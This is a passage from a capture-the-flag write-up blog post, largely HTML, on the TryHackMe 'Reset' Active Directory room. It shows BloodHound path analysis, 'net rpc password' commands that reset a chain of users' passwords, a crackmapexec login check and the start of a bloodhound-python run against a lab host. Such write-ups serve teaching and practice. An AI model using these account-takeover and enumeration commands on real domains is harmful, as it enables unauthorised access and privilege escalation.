class=\"wp-block-image size-large wp-lightbox-container\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"437\" data-attachment-id=\"360\" data-permalink=\"https:\/\/blog.ishsome.com\/index.php\/2024\/01\/28\/tryhackme-reset\/image-51\/\" data-orig-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/image-51.png?fit=1743%2C744&amp;ssl=1\" data-orig-size=\"1743,744\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"image-51\" data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/image-51.png?fit=1024%2C437&amp;ssl=1\" data-wp-class--hide=\"state.isContentHidden\" data-wp-class--show=\"state.isContentVisible\" data-wp-init=\"callbacks.setButtonStyles\" data-wp-on--click=\"actions.showLightbox\" data-wp-on--load=\"callbacks.setButtonStyles\" data-wp-on-window--resize=\"callbacks.setButtonStyles\" src=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/image-51.png?resize=1024%2C437&#038;ssl=1\" alt=\"\" class=\"wp-image-360\" srcset=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/image-51.png?resize=1024%2C437&amp;ssl=1 1024w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/image-51.png?resize=300%2C128&amp;ssl=1 300w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/image-51.png?resize=768%2C328&amp;ssl=1 768w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/image-51.png?resize=1536%2C656&amp;ssl=1 1536w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/image-51.png?resize=600%2C256&amp;ssl=1 600w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/image-51.png?w=1743&amp;ssl=1 1743w\" sizes=\"auto, (max-width: 1000px) 100vw, 1000px\" \/><button\n\t\t\tclass=\"lightbox-trigger\"\n\t\t\ttype=\"button\"\n\t\t\taria-haspopup=\"dialog\"\n\t\t\taria-label=\"Enlarge\"\n\t\t\tdata-wp-init=\"callbacks.initTriggerButton\"\n\t\t\tdata-wp-on--click=\"actions.showLightbox\"\n\t\t\tdata-wp-style--right=\"state.imageButtonRight\"\n\t\t\tdata-wp-style--top=\"state.imageButtonTop\"\n\t\t>\n\t\t\t<svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"12\" height=\"12\" fill=\"none\" viewBox=\"0 0 12 12\">\n\t\t\t\t<path fill=\"#fff\" d=\"M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z\" \/>\n\t\t\t<\/svg>\n\t\t<\/button><\/figure>\n\n\n\n<div style=\"height:22px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>We can search for our user and mark as owned. Then go to OUTBOUND OBJECT CONTROL under the Node Analysis tab and click on <strong><em><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-luminous-vivid-amber-color\">Transitive Object Control<\/mark><\/em><\/strong>. Here you will see how we can move laterally from one user to another and shorten our path to the Administrator.<\/p>\n\n\n\n<div style=\"height:15px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<figure data-wp-context=\"{&quot;imageId&quot;:&quot;6a03b09f754ee&quot;}\" data-wp-interactive=\"core\/image\" data-wp-key=\"6a03b09f754ee\" class=\"wp-block-image size-large wp-lightbox-container\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"775\" data-attachment-id=\"361\" data-permalink=\"https:\/\/blog.ishsome.com\/index.php\/2024\/01\/28\/tryhackme-reset\/image-52\/\" data-orig-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/image-52.png?fit=1628%2C1232&amp;ssl=1\" data-orig-size=\"1628,1232\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"image-52\" data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/image-52.png?fit=1024%2C775&amp;ssl=1\" data-wp-class--hide=\"state.isContentHidden\" data-wp-class--show=\"state.isContentVisible\" data-wp-init=\"callbacks.setButtonStyles\" data-wp-on--click=\"actions.showLightbox\" data-wp-on--load=\"callbacks.setButtonStyles\" data-wp-on-window--resize=\"callbacks.setButtonStyles\" src=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/image-52.png?resize=1024%2C775&#038;ssl=1\" alt=\"\" class=\"wp-image-361\" srcset=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/image-52.png?resize=1024%2C775&amp;ssl=1 1024w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/image-52.png?resize=300%2C227&amp;ssl=1 300w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/image-52.png?resize=768%2C581&amp;ssl=1 768w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/image-52.png?resize=1536%2C1162&amp;ssl=1 1536w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/image-52.png?resize=600%2C454&amp;ssl=1 600w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/image-52.png?w=1628&amp;ssl=1 1628w\" sizes=\"auto, (max-width: 1000px) 100vw, 1000px\" \/><button\n\t\t\tclass=\"lightbox-trigger\"\n\t\t\ttype=\"button\"\n\t\t\taria-haspopup=\"dialog\"\n\t\t\taria-label=\"Enlarge\"\n\t\t\tdata-wp-init=\"callbacks.initTriggerButton\"\n\t\t\tdata-wp-on--click=\"actions.showLightbox\"\n\t\t\tdata-wp-style--right=\"state.imageButtonRight\"\n\t\t\tdata-wp-style--top=\"state.imageButtonTop\"\n\t\t>\n\t\t\t<svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"12\" height=\"12\" fill=\"none\" viewBox=\"0 0 12 12\">\n\t\t\t\t<path fill=\"#fff\" d=\"M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z\" \/>\n\t\t\t<\/svg>\n\t\t<\/button><\/figure>\n\n\n\n<div style=\"height:15px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>By right-clicking on the link between two users and then clicking on the Help option, BloodHound will show you how to abuse the rights to have been assigned and change their RPC passwords.<\/p>\n\n\n\n<div style=\"height:14px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<figure data-wp-context=\"{&quot;imageId&quot;:&quot;6a03b09f75a8c&quot;}\" data-wp-interactive=\"core\/image\" data-wp-key=\"6a03b09f75a8c\" class=\"wp-block-image size-large wp-lightbox-container\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"726\" data-attachment-id=\"362\" data-permalink=\"https:\/\/blog.ishsome.com\/index.php\/2024\/01\/28\/tryhackme-reset\/image-53\/\" data-orig-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/image-53.png?fit=1194%2C846&amp;ssl=1\" data-orig-size=\"1194,846\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"image-53\" data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/image-53.png?fit=1024%2C726&amp;ssl=1\" data-wp-class--hide=\"state.isContentHidden\" data-wp-class--show=\"state.isContentVisible\" data-wp-init=\"callbacks.setButtonStyles\" data-wp-on--click=\"actions.showLightbox\" data-wp-on--load=\"callbacks.setButtonStyles\" data-wp-on-window--resize=\"callbacks.setButtonStyles\" src=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/image-53.png?resize=1024%2C726&#038;ssl=1\" alt=\"\" class=\"wp-image-362\" srcset=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/image-53.png?resize=1024%2C726&amp;ssl=1 1024w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/image-53.png?resize=300%2C213&amp;ssl=1 300w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/image-53.png?resize=768%2C544&amp;ssl=1 768w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/image-53.png?resize=600%2C425&amp;ssl=1 600w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/image-53.png?w=1194&amp;ssl=1 1194w\" sizes=\"auto, (max-width: 1000px) 100vw, 1000px\" \/><button\n\t\t\tclass=\"lightbox-trigger\"\n\t\t\ttype=\"button\"\n\t\t\taria-haspopup=\"dialog\"\n\t\t\taria-label=\"Enlarge\"\n\t\t\tdata-wp-init=\"callbacks.initTriggerButton\"\n\t\t\tdata-wp-on--click=\"actions.showLightbox\"\n\t\t\tdata-wp-style--right=\"state.imageButtonRight\"\n\t\t\tdata-wp-style--top=\"state.imageButtonTop\"\n\t\t>\n\t\t\t<svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"12\" height=\"12\" fill=\"none\" viewBox=\"0 0 12 12\">\n\t\t\t\t<path fill=\"#fff\" d=\"M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z\" \/>\n\t\t\t<\/svg>\n\t\t<\/button><\/figure>\n\n\n\n<div style=\"height:16px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>By running the following commands, we can change passwords for the users along the path.<\/p>\n\n\n\n<div style=\"height:14px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<div class=\"wp-block-kevinbatdorf-code-block-pro\" data-code-block-pro-font-family=\"Code-Pro-JetBrains-Mono\" style=\"font-size:.875rem;font-family:Code-Pro-JetBrains-Mono,ui-monospace,SFMono-Regular,Menlo,Monaco,Consolas,monospace;line-height:1.25rem;--cbp-tab-width:2;tab-size:var(--cbp-tab-width, 2)\"><span style=\"display:block;padding:16px 0 0 16px;margin-bottom:-1px;width:100%;text-align:left;background-color:#0F111A\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"54\" height=\"14\" viewBox=\"0 0 54 14\"><g fill=\"none\" fill-rule=\"evenodd\" transform=\"translate(1 1)\"><circle cx=\"6\" cy=\"6\" r=\"6\" fill=\"#FF5F56\" stroke=\"#E0443E\" stroke-width=\".5\"><\/circle><circle cx=\"26\" cy=\"6\" r=\"6\" fill=\"#FFBD2E\" stroke=\"#DEA123\" stroke-width=\".5\"><\/circle><circle cx=\"46\" cy=\"6\" r=\"6\" fill=\"#27C93F\" stroke=\"#1AAB29\" stroke-width=\".5\"><\/circle><\/g><\/svg><\/span><span role=\"button\" tabindex=\"0\" data-code=\"\u250c\u2500\u2500(ishsome\u327fkali)-[~\/THM\/Windows-Boxes\/Reset]\n\u2514\u2500$ net rpc password &quot;SHAWNA_BRAY&quot; &quot;Resetme123@&quot; -U &quot;thm.corp&quot;\/&quot;TABATHA_BRITT&quot;%&quot;marxxxxxx)&quot; -S &quot;10.10.52.38&quot;\n                                                                                                                                                                                                               \n\u250c\u2500\u2500(ishsome\u327fkali)-[~\/THM\/Windows-Boxes\/Reset]\n\u2514\u2500$ net rpc password &quot;CRUZ_HALL&quot; &quot;Resetme456@&quot; -U &quot;thm.corp&quot;\/&quot;SHAWNA_BRAY&quot;%&quot;Resetme123@&quot; -S &quot;10.10.52.38&quot;\n                                                                                                             \n\u250c\u2500\u2500(ishsome\u327fkali)-[~\/THM\/Windows-Boxes\/Reset]\n\u2514\u2500$ net rpc password &quot;DARLA_WINTERS&quot; &quot;Resetme789@&quot; -U &quot;thm.corp&quot;\/&quot;CRUZ_HALL&quot;%&quot;Resetme456@&quot; -S &quot;10.10.52.38&quot;\n\" style=\"color:#babed8;display:none\" aria-label=\"Copy\" class=\"code-block-pro-copy-button\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" style=\"width:24px;height:24px\" fill=\"none\" viewBox=\"0 0 24 24\" stroke=\"currentColor\" stroke-width=\"2\"><path class=\"with-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2m-6 9l2 2 4-4\"><\/path><path class=\"without-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2\"><\/path><\/svg><\/span><pre class=\"shiki material-theme-ocean\" style=\"background-color: #0F111A\" tabindex=\"0\"><code><span class=\"line\"><span style=\"color: #FFCB6B\">\u250c\u2500\u2500(ishsome\u327fkali<\/span><span style=\"color: #BABED8\">)-<\/span><span style=\"color: #89DDFF\">[<\/span><span style=\"color: #BABED8\">~\/THM\/Windows-Boxes\/Reset<\/span><span style=\"color: #89DDFF\">]<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">\u2514\u2500$<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">net<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">rpc<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">password<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #89DDFF\">&quot;<\/span><span style=\"color: #C3E88D\">SHAWNA_BRAY<\/span><span style=\"color: #89DDFF\">&quot;<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #89DDFF\">&quot;<\/span><span style=\"color: #C3E88D\">Resetme123@<\/span><span style=\"color: #89DDFF\">&quot;<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">-U<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #89DDFF\">&quot;<\/span><span style=\"color: #C3E88D\">thm.corp<\/span><span style=\"color: #89DDFF\">&quot;<\/span><span style=\"color: #C3E88D\">\/<\/span><span style=\"color: #89DDFF\">&quot;<\/span><span style=\"color: #C3E88D\">TABATHA_BRITT<\/span><span style=\"color: #89DDFF\">&quot;<\/span><span style=\"color: #C3E88D\">%<\/span><span style=\"color: #89DDFF\">&quot;<\/span><span style=\"color: #C3E88D\">marxxxxxx)<\/span><span style=\"color: #89DDFF\">&quot;<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">-S<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #89DDFF\">&quot;<\/span><span style=\"color: #C3E88D\">10.10.52.38<\/span><span style=\"color: #89DDFF\">&quot;<\/span><\/span>\n<span class=\"line\"><span style=\"color: #BABED8\">                                                                                                                                                                                                               <\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">\u250c\u2500\u2500(ishsome\u327fkali<\/span><span style=\"color: #BABED8\">)-<\/span><span style=\"color: #89DDFF\">[<\/span><span style=\"color: #BABED8\">~\/THM\/Windows-Boxes\/Reset<\/span><span style=\"color: #89DDFF\">]<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">\u2514\u2500$<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">net<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">rpc<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">password<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #89DDFF\">&quot;<\/span><span style=\"color: #C3E88D\">CRUZ_HALL<\/span><span style=\"color: #89DDFF\">&quot;<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #89DDFF\">&quot;<\/span><span style=\"color: #C3E88D\">Resetme456@<\/span><span style=\"color: #89DDFF\">&quot;<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">-U<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #89DDFF\">&quot;<\/span><span style=\"color: #C3E88D\">thm.corp<\/span><span style=\"color: #89DDFF\">&quot;<\/span><span style=\"color: #C3E88D\">\/<\/span><span style=\"color: #89DDFF\">&quot;<\/span><span style=\"color: #C3E88D\">SHAWNA_BRAY<\/span><span style=\"color: #89DDFF\">&quot;<\/span><span style=\"color: #C3E88D\">%<\/span><span style=\"color: #89DDFF\">&quot;<\/span><span style=\"color: #C3E88D\">Resetme123@<\/span><span style=\"color: #89DDFF\">&quot;<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">-S<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #89DDFF\">&quot;<\/span><span style=\"color: #C3E88D\">10.10.52.38<\/span><span style=\"color: #89DDFF\">&quot;<\/span><\/span>\n<span class=\"line\"><span style=\"color: #BABED8\">                                                                                                             <\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">\u250c\u2500\u2500(ishsome\u327fkali<\/span><span style=\"color: #BABED8\">)-<\/span><span style=\"color: #89DDFF\">[<\/span><span style=\"color: #BABED8\">~\/THM\/Windows-Boxes\/Reset<\/span><span style=\"color: #89DDFF\">]<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">\u2514\u2500$<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">net<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">rpc<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">password<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #89DDFF\">&quot;<\/span><span style=\"color: #C3E88D\">DARLA_WINTERS<\/span><span style=\"color: #89DDFF\">&quot;<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #89DDFF\">&quot;<\/span><span style=\"color: #C3E88D\">Resetme789@<\/span><span style=\"color: #89DDFF\">&quot;<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">-U<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #89DDFF\">&quot;<\/span><span style=\"color: #C3E88D\">thm.corp<\/span><span style=\"color: #89DDFF\">&quot;<\/span><span style=\"color: #C3E88D\">\/<\/span><span style=\"color: #89DDFF\">&quot;<\/span><span style=\"color: #C3E88D\">CRUZ_HALL<\/span><span style=\"color: #89DDFF\">&quot;<\/span><span style=\"color: #C3E88D\">%<\/span><span style=\"color: #89DDFF\">&quot;<\/span><span style=\"color: #C3E88D\">Resetme456@<\/span><span style=\"color: #89DDFF\">&quot;<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">-S<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #89DDFF\">&quot;<\/span><span style=\"color: #C3E88D\">10.10.52.38<\/span><span style=\"color: #89DDFF\">&quot;<\/span><\/span>\n<span class=\"line\"><\/span><\/code><\/pre><\/div>\n\n\n\n<div style=\"height:14px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>Finally, we can test if the password has been changed by trying to authenticate via SMB.<\/p>\n\n\n\n<div style=\"height:19px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<div class=\"wp-block-kevinbatdorf-code-block-pro\" data-code-block-pro-font-family=\"Code-Pro-JetBrains-Mono\" style=\"font-size:.875rem;font-family:Code-Pro-JetBrains-Mono,ui-monospace,SFMono-Regular,Menlo,Monaco,Consolas,monospace;line-height:1.25rem;--cbp-tab-width:2;tab-size:var(--cbp-tab-width, 2)\"><span style=\"display:block;padding:16px 0 0 16px;margin-bottom:-1px;width:100%;text-align:left;background-color:#0F111A\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"54\" height=\"14\" viewBox=\"0 0 54 14\"><g fill=\"none\" fill-rule=\"evenodd\" transform=\"translate(1 1)\"><circle cx=\"6\" cy=\"6\" r=\"6\" fill=\"#FF5F56\" stroke=\"#E0443E\" stroke-width=\".5\"><\/circle><circle cx=\"26\" cy=\"6\" r=\"6\" fill=\"#FFBD2E\" stroke=\"#DEA123\" stroke-width=\".5\"><\/circle><circle cx=\"46\" cy=\"6\" r=\"6\" fill=\"#27C93F\" stroke=\"#1AAB29\" stroke-width=\".5\"><\/circle><\/g><\/svg><\/span><span role=\"button\" tabindex=\"0\" data-code=\"\u250c\u2500\u2500(ishsome\u327fkali)-[~\/THM\/Windows-Boxes\/Reset\/BloodHound]\n\u2514\u2500$ crackmapexec smb 10.10.52.38 -u DARLA_WINTERS -p 'Resetme789@'\nSMB         10.10.52.38     445    HAYSTACK         [*] Windows 10.0 Build 17763 x64 (name:HAYSTACK) (domain:thm.corp) (signing:True) (SMBv1:False)\nSMB         10.10.52.38     445    HAYSTACK         [+] thm.corp\\DARLA_WINTERS:Resetme789@ \n\" style=\"color:#babed8;display:none\" aria-label=\"Copy\" class=\"code-block-pro-copy-button\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" style=\"width:24px;height:24px\" fill=\"none\" viewBox=\"0 0 24 24\" stroke=\"currentColor\" stroke-width=\"2\"><path class=\"with-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2m-6 9l2 2 4-4\"><\/path><path class=\"without-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2\"><\/path><\/svg><\/span><pre class=\"shiki material-theme-ocean\" style=\"background-color: #0F111A\" tabindex=\"0\"><code><span class=\"line\"><span style=\"color: #FFCB6B\">\u250c\u2500\u2500(ishsome\u327fkali<\/span><span style=\"color: #BABED8\">)-<\/span><span style=\"color: #89DDFF\">[<\/span><span style=\"color: #BABED8\">~\/THM\/Windows-Boxes\/Reset\/BloodHound<\/span><span style=\"color: #89DDFF\">]<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">\u2514\u2500$<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">crackmapexec<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">smb<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">10.10<\/span><span style=\"color: #C3E88D\">.52.38<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">-u<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">DARLA_WINTERS<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">-p<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #89DDFF\">&#39;<\/span><span style=\"color: #C3E88D\">Resetme789@<\/span><span style=\"color: #89DDFF\">&#39;<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">SMB<\/span><span style=\"color: #BABED8\">         <\/span><span style=\"color: #F78C6C\">10.10<\/span><span style=\"color: #C3E88D\">.52.38<\/span><span style=\"color: #BABED8\">     <\/span><span style=\"color: #F78C6C\">445<\/span><span style=\"color: #BABED8\">    <\/span><span style=\"color: #C3E88D\">HAYSTACK<\/span><span style=\"color: #BABED8\">         [*] Windows 10.0 Build 17763 x64 <\/span><span style=\"color: #89DDFF\">(<\/span><span style=\"color: #FFCB6B\">name:HAYSTACK<\/span><span style=\"color: #89DDFF\">)<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #89DDFF\">(<\/span><span style=\"color: #FFCB6B\">domain:thm.corp<\/span><span style=\"color: #89DDFF\">)<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #89DDFF\">(<\/span><span style=\"color: #FFCB6B\">signing:True<\/span><span style=\"color: #89DDFF\">)<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #89DDFF\">(<\/span><span style=\"color: #FFCB6B\">SMBv1:False<\/span><span style=\"color: #89DDFF\">)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">SMB<\/span><span style=\"color: #BABED8\">         <\/span><span style=\"color: #F78C6C\">10.10<\/span><span style=\"color: #C3E88D\">.52.38<\/span><span style=\"color: #BABED8\">     <\/span><span style=\"color: #F78C6C\">445<\/span><span style=\"color: #BABED8\">    <\/span><span style=\"color: #C3E88D\">HAYSTACK<\/span><span style=\"color: #BABED8\">         [+] thm.corp\\DARLA_WINTERS:Resetme789@ <\/span><\/span>\n<span class=\"line\"><\/span><\/code><\/pre><\/div>\n\n\n\n<p>Great! It worked!<\/p>\n\n\n\n<p>We can run BloodHound again, but this time we will use <strong><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-luminous-vivid-amber-color\">DARLA_WINTERS<\/mark><\/strong> credentials. This will give us more insight into the privileges\/rights Darla has and may be an easy way to privilege escalate as an Administrator.<\/p>\n\n\n\n<div style=\"height:14px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<div class=\"wp-block-kevinbatdorf-code-block-pro\" data-code-block-pro-font-family=\"Code-Pro-JetBrains-Mono\" style=\"font-size:.875rem;font-family:Code-Pro-JetBrains-Mono,ui-monospace,SFMono-Regular,Menlo,Monaco,Consolas,monospace;line-height:1.25rem;--cbp-tab-width:2;tab-size:var(--cbp-tab-width, 2)\"><span style=\"display:block;padding:16px 0 0 16px;margin-bottom:-1px;width:100%;text-align:left;background-color:#0F111A\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"54\" height=\"14\" viewBox=\"0 0 54 14\"><g fill=\"none\" fill-rule=\"evenodd\" transform=\"translate(1 1)\"><circle cx=\"6\" cy=\"6\" r=\"6\" fill=\"#FF5F56\" stroke=\"#E0443E\" stroke-width=\".5\"><\/circle><circle cx=\"26\" cy=\"6\" r=\"6\" fill=\"#FFBD2E\" stroke=\"#DEA123\" stroke-width=\".5\"><\/circle><circle cx=\"46\" cy=\"6\" r=\"6\" fill=\"#27C93F\" stroke=\"#1AAB29\" stroke-width=\".5\"><\/circle><\/g><\/svg><\/span><span role=\"button\" tabindex=\"0\" data-code=\"\u250c\u2500\u2500(ishsome\u327fkali)-[~\/THM\/Windows-Boxes\/Reset\/Darla_Winters]\n\u2514\u2500$ bloodhound-python -d thm.corp -u DARLA_WINTERS -p 'Resetme789@' -ns 10.10.52.38 -c all\nINFO: Found AD domain: thm.corp\nINFO: Getting TGT for user\nINFO: Connecting to LDAP server: haystack.thm.corp\nINFO: Found 1 domains\nINFO: Found 1 